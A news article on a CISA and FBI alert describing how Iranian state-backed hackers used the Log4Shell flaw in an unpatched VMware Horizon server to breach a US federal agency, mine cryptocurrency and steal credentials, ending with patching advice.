Iranian Hacker Group Uses Log4Shell to Cryptojack US AgencyHackers Exploited an Unpatched VMWare Horizon Server to Gain Access
Hackers sponsored by the Iranian government broke into an unnamed U.S. federal agency's network, stole passwords and implanted cryptocurrency mining software, cybersecurity officials disclosed Wednesday.
The Iranian group - an official security alert doesn't supply its name - exploited a vulnerability that was the subject of a governmentwide emergency patching directive issued last December - CVE-2021-44228, better known as Log4Shell. In this case, hackers found an unpatched instance of VMware Horizon servers.
Federal authorities have warned that the vulnerability in open-source Java utility Log4j is a favorite of nation-state hackers. The utility, maintained by The Apache Software Foundation, is often deployed as a software library in other applications, including other Apache applications and VMWare products. The Cyber Safety Review Board, a federally run committee, earlier this year characterized Log4Shell as an "endemic vulnerability" likely to cause problems for up to a decade and possibly even longer (see: Log4j Flaw Is 'Endemic,' Says Cyber Safety Review Board).
The state-backed hackers installed XMRig crypto mining software, moved laterally to the domain controller, compromised credentials and implanted Ngrok reverse proxies on several hosts to maintain persistence, the Cybersecurity and Infrastructure Security Agency and the FBI said in the government alert. The attack likely began in February. CISA says it detected the intrusion in April and worked with the agency in June and July to eradicate the hackers.
Whether the Iranians were acting wholly on Tehran's behalf, on their own behalf, or both, is uncertain. The Department of Justice in September indicted three Iranian hackers affiliated with the Islamic Revolutionary Guard Corps for ransomware without making a direct connection to state-sponsored attacks. A senior Department of Justice official speaking on condition of anonymity suggested the hackers were engaged in a financially motivated side project.
This incident could well be the same, said John Hultquist, head of intelligence analysis at cyberthreat intelligence firm Mandiant. "Iran and their peers depend on contractors to carry out cyberespionage and attack activities. Many of these contractors moonlight as criminals and it can be difficult to distinguish this activity from the work done at the behest of the state," he said.
Log4Shell is one of the most popular Java logging packages, downloaded by more than 51 million users since December 2021, and 38% of those are still vulnerable, according to one industry estimate.
To prevent cyberattacks against the vulnerable systems, CISA and the FBI recommend that organizations update VMware Horizon and unified access gateway systems to the latest versions. The vulnerable versions are detailed in VMWare's security advisory and knowledge base.